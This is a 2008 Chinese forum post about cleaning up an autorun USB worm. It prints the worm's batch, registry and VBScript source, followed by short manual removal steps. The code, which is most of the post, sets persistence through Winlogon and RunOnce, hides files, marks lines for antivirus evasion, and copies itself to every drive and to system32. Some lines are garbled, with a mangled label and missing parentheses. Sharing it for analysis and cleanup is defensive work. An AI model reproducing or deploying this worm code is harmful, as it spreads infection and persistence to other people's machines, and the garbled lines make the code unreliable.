新型超强autorun病毒的清除方法:
有些这种病毒手工杀更有效的,比如这个病毒:
在每个盘根目录下生成四个文件:autorun.inf,autorun.reg,autorun.bat,auto.vbs,可惜第一个文件被我弄丢了,下面把该病毒代码发给大家共享下:
autorun.bat
@echo off
if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit
';免杀
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
';免杀
pen
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
exit
:next2
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
if "%1"=="-" attrib -s -a -h -r %2\sxs.exe
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
if "%1"=="+" attrib +s +a +h +r %2\sxs.exe
:end
autorun.reg Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,autorun.bat" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"autorun"="sxs.exe" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
"Hidden"=dword:00000002
QUOTE:
autorun.vbs
on error resume next
Set WshShell =CreateObject("WScript.Shell"
if 1=0 then
else
For i=1 to 1
set Of = CreateObject("Scripting.FileSystemObject"
set dir = Of.GetSpecialFolder(1)
Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\autorun.vbs" then
isdir=true
else
a=WshShell.Run("autorun.bat Open" ,0,False)
isdir=false
end if
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:" Then
a=WshShell.Run("autorun.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\autorun.bat",d&"\",True
Of.CopyFile dir&"\sxs.exe",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\autorun.reg",d&"\",True
Of.CopyFile dir&"\autorun.vbs",d&"\",True
else
Of.CopyFile "autorun.bat",d&"\",True
Of.CopyFile "sxs.exe",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
Of.CopyFile "autorun.reg",d&"\",True
Of.CopyFile "autorun.vbs",d&"\",True
end if
a=WshShell.Run("autorun.bat + "&d ,0,True)
End If
next
if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("autorun.bat - "&dir ,0,True)
Of.CopyFile "autorun.bat",dir&"\",True
Of.CopyFile "sxs.exe",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "autorun.reg",dir&"\",True
Of.CopyFile "autorun.vbs",dir&"\",True
a=WshShell.Run("autorun.bat + "&dir ,0,True)
End if
next
End if
清除方法:
1.先去掉文件的隐藏属性.
2.再到system 32目录下删除autorun.*
(*表示后缀名为bat,reg,inf,vbs)
3.到每个盘的根目录下删除autorun.*文件.
4.到这里就基本结束了.干净些就到注册表里把上文提到的autorun.reg文件中的项值逐一删除!自此ok!
[ 本帖最后由 promised 于 2008-5-1 18:02 编辑 ] |